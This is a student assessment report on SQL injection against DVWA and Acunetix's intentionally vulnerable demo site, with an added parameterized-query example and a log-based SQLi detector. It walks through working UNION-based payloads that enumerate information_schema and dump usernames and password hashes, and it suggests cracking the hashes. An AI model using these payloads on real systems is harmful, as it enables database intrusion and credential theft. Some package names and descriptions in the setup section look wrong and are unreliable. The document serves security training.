
ASSIGNMENT-4

SQL INJECTION ON DVWA AND ACUNETIX


ASSESSMENT REPORT

BY: S VENKATESH REDDY

TARGET: DVWA & ACUNETIX


BRIEF CONTENTS

1 Introduction
2 Installation
3 Setup DVWA for SQL Injection
1 What is SQL Injection

A SQL injection attack consists of the "insertion/injection" of a SQL query via the input data from
the client to the application. A successful SQL injection exploit can read or modify
(insert/update/delete) sensitive data in the database, execute administration operations (such as
shutting down the DBMS), recover the content of a given file present on the DBMS file system, and in
some cases issue commands to the operating system.
"SQL injection attacks — in which SQL commands are injected into data-plane input in order to affect
the execution of predefined SQL commands." — OWASP.

Verizon Attack Vector Summary – confirmed breaches (percent of total records stolen)
2 Download Damn Vulnerable Web Application (DVWA)

To get started, we need to clone the DVWA GitHub repository into the /var/www/html directory, which
is where localhost web files are stored on Linux systems. Launch the Terminal and change directory to
/var/www/html with the command below. Before that, we check which PHP version DVWA requires.
The following command lists all PHP-related packages that exist on the current system and saves
them to a text file named packages.txt. This list helps to reconstruct the same set of packages on
PHP 8.2.

2.1 Add the ondrej/php PPA as a software repository


The repositories maintained by Ondřej Surý contain the main PHP packages and are kept updated.
After this repository is added to the system's list of software sources, the initial installation
and later updates can be done with the standard apt commands.
Create the php.list file pointing at the latest versions before building the server.
2.2 Update the Kali Linux OS and installed packages, so that the packages to be compiled are current
and the kernel and OS are brought up to the latest versions from the kali.org repository lists.

2.3. Install PHP 8.2 and extensions

All PHP 8.2 packages available in the repository added in step 2.1 follow the php8.2- naming
pattern. Extensions bundled with PHP, such as json, ctype, date and random, do not need to be
installed manually. The php8.2-common package includes several common PHP packages. It is possible
to selectively disable unnecessary extensions later.
2.4. Install and enable server APIs
On a system where a web server integrates with PHP, install the additional Server API packages. The
following are some examples of the most popular combinations:
2.5 Configure Apache Server
Now we need to configure the server. Use the command below to change the Terminal's working
directory to /etc/php/8.2/apache2.

In /etc/php/8.2/apache2, when you run the ls command, you will see a file called php.ini. That is
the file we will edit to configure our localhost server. Use the command below to open it in the
nano editor.

sudo nano php.ini


Scroll down and look for these two lines: allow_url_fopen and allow_url_include. Set them both to
On (DVWA needs them for its file-inclusion exercises; they should stay Off on any server that is not
a lab). Save the file (Ctrl + O, then Enter) and exit (Ctrl + X).
Start the Apache server using the command below:

sudo service apache2 start

To check whether the service started successfully, use the status command.

systemctl status apache2

Installation of the DVWA web server dependencies

This command will install the following modules:

- php8.2-cli - command interpreter, useful for testing PHP scripts from a shell or performing
general shell scripting tasks
- php8.2-common - documentation, examples, and common modules for PHP
- php8.2-mariadb-server - for working with MySQL databases
- php8.2-apache2 - running the Apache server for the GUI
- php8.2-libapache2-mod-php - for working with images
- php8.2-nginx - used to manage redirecting of JS and CSS
- php8.2-curl - lets you make HTTP requests in PHP
- php8.2-xml - for working with XML data
- php8.2-bcmath - used when working with precision floats

Below are the dependencies


After all dependencies are installed, we start the DVWA service as shown below.

3. Setup DVWA for SQL Injection


Damn Vulnerable Web App is a PHP/MySQL web application that has been engineered to be deliberately
vulnerable to a great variety of attack vectors, so that security professionals can test their skills
and tools in a legal environment. It is a very useful tool when learning and applying security
testing techniques to applications within an SDLC.
Go to the SQL Injection section. Its form queries the MySQL server through an injectable parameter,
which lets us bypass the intended lookup and extract data from the database.
On the User ID field, enter "1" and click Submit. That is supposed to print the ID, First_name
and Surname on the screen, as you can see below.

The SQL syntax being exploited here is:

Interestingly, when you check the URL, you will see there is an injectable parameter, which is the
ID. Currently, my URL looks like this:

http://127.0.0.1:42001/vulnerabilities/sqli/?id=4&Submit=Submit&user_token=eb6d5cfd46b2f90034ccc8292da1ac09#

With the security level set to Impossible we could not perform any injection through the search
field. We need to set it to Low for the SQL injection attack to work.
Step 3: Always True Scenario
An advanced method to extract all the First_names and Surnames from the database would be
to use the input: %' or '1'='1'
Step 4: Display Database Version
To know the database version the DVWA application is running on, enter the text below in the
User ID field.
Step 5: Display Database User
To display the database user that executed the PHP code powering the database, enter the text
below in the User ID field.

Step 6: Display Database Name


To display the database name, we will inject the SQL code below in the User ID field.

%' or 0=0 union select null, user() #


Step 7: Display all tables in information_schema
The Information Schema stores information about tables, columns, and all the databases
maintained by MySQL. To display all the tables present in the information_schema, use the text
below.

%' and 1=0 union select null, table_name from information_schema.tables #


Step 8: Display all the user tables in information_schema
For this step, we will print all the tables that start with the prefix user as stored in the
information_schema. Enter the SQL code below in the User ID field.

%' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#
Step 9: Display all the column fields in the information_schema users table
We will print all the columns present in the users table. This information will include column
names like User_ID, first_name, last_name, user, and password. Enter the input in the
User ID field.

%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
Step 10: Display Column field contents
To display all the necessary authentication information present in the columns as stored in the
information_schema, use the SQL syntax below:

%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #


From the image above, you can see the password was returned in its hashed format. To recover
the password, copy the MD5 hash and use applications like John the Ripper to crack it. There
are also sites on the internet where you can paste the hash and, if lucky, you will be
able to recover the password.
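The weakness behind Steps 3 to 10 is the string-built query. The following is an added example (not part of the report or of DVWA) that mirrors it in Python with an in-memory SQLite table of constructed rows, and runs the always-true and UNION payloads through both the vulnerable query and a parameterized one. Since SQLite does not treat MySQL's # as a comment, the terminator is written as --.

```python
import sqlite3

# Constructed sample rows standing in for DVWA's users table; the hashes are placeholders.
SAMPLE_USERS = [
    (1, "admin", "admin", "admin", "md5-placeholder-1"),
    (2, "Gordon", "Brown", "gordonb", "md5-placeholder-2"),
]

# Payloads in the spirit of Step 3 and Step 10, with MySQL's '#' swapped for SQLite's '--'.
ALWAYS_TRUE = "%' or '1'='1"
UNION_DUMP = "x' union select user, password from users -- "


def make_db():
    """In-memory SQLite database holding the constructed users table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, "
               "last_name TEXT, user TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    return db


def vulnerable_lookup(db, user_id):
    """String-built query: the pattern behind DVWA's Low security level."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return db.execute(query).fetchall()


def safe_lookup(db, user_id):
    """Same query with a bound parameter: the input can only ever be data."""
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(query, (user_id,)).fetchall()


def compare(payload):
    """Run one input through both versions; returns (vulnerable_rows, safe_rows)."""
    db = make_db()
    try:
        vuln = sorted(vulnerable_lookup(db, payload))
    except sqlite3.Error as exc:  # a syntax error on a quote is itself a finding
        vuln = f"SQL error: {exc}"
    return vuln, safe_lookup(db, payload)


if __name__ == "__main__":
    for p in ("1", ALWAYS_TRUE, UNION_DUMP):
        print(repr(p), "->", compare(p))
```

The parameterized version returns nothing for both payloads, which is exactly the behaviour DVWA's Impossible level shows.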

Conclusion

From the various examples listed in this article, SQL injection proves to be a critical vulnerability
that can exist in a system. Not only can attackers exploit it to reveal user or customer
information, but it can also be used to corrupt the entire database thus bringing the whole
system down. As of writing this post (2021), Injection is listed as the number one vulnerability in
the OWASP Top 10 Vulnerabilities summary. The DVWA acts as a reliable resource for both
penetration testers who want to improve their skills and web developers who want to develop
systems with security in mind.

Acunetix SQL Injection


Types of SQLi:

1. UNION Based SQLi

2. Error Based SQLi

3. Blind SQLi
i) Time based SQLi
ii) Boolean based SQLi

UNION Based SQL Injections

In Union Based SQL Injections, we try to modify the existing SQL Query, in order to retrieve
sensitive information from the database.

We will be testing for SQLi’s on a vulnerable demo site by Acunetix: http://testphp.vulnweb.com.

1. Try inserting a quote in the parameter cat.


2. Let's try inserting an always-true condition such as '+OR+1=1 -- or ' OR 1=1 -- in the parameter
cat, and look whether we get anything interesting.

3. But here, as we don't know the table names, we will start by guessing the number of columns the
query returns. Use the query order by 10--. Depending on the quote used in the DB, modify the
request accordingly. Here we are not getting any error, which confirms that at least 10 columns
exist.

http://testphp.vulnweb.com/listproducts.php?cat=1 order by 10--


5. Now we know that the query returns 11 columns. We will look for the vulnerable columns whose
contents are reflected in the page. Use the query union select 1,2,3,4,5,6,7,8,9,10,11--. This
shows which columns are displayed.
Refer to the image below: we got the numbers 2, 7 and 9. Thus columns 2, 7 and 9 are vulnerable to
SQLi.

http://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11--
6. Finally, we got the table_name and column_name. Time to dump the credentials. Use the query union
select 1,uname,3,4,5,6,pass,8,9,10,11 from users --. As column 7 is also vulnerable, we can retrieve
details there. Scroll down to the bottom to view the results.
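Seen from the server side, the probes in steps 1 to 6 leave a recognisable trail in the access log. The following is an added example (not from the report or from Acunetix) that URL-decodes each request's query string and flags the quote probe, tautology, order by column counting and union select stages over a few constructed Apache-style log lines.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache-style access log lines; the paths echo the probes above (not captured traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 5123
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /listproducts.php?cat=1%27 HTTP/1.1" 200 4001
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /listproducts.php?cat=1%20order%20by%2010-- HTTP/1.1" 200 5123
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /listproducts.php?cat=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11-- HTTP/1.1" 200 5300
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /search.php?q=union+station HTTP/1.1" 200 2200
"""

# Common Log Format: client, ident, user, [timestamp], "method path protocol", status ...
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Signatures for the probe stages, applied to the decoded query string.
SIGNATURES = {
    "quote_probe": re.compile(r"=[^&]*'"),
    "tautology": re.compile(r"\bor\s+['\d]+\s*=\s*['\d]+", re.I),
    "column_count": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
}


def decoded_query(path):
    """URL-decoded query string of a request path ('' when there is none)."""
    _, _, query = path.partition("?")
    return unquote_plus(query)


def classify(path):
    """Names of the signatures that fire on this request's decoded query string."""
    q = decoded_query(path)
    return [name for name, rx in SIGNATURES.items() if rx.search(q)]


def scan_log(text):
    """Return (client_ip, path, hits) for every request matching at least one signature."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, _ts, _method, path, _status = m.groups()
        hits = classify(path)
        if hits:
            findings.append((ip, path, hits))
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The last log line shows why decoding and word boundaries matter: "union station" contains the keyword but not the union select pattern, so it is not flagged.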
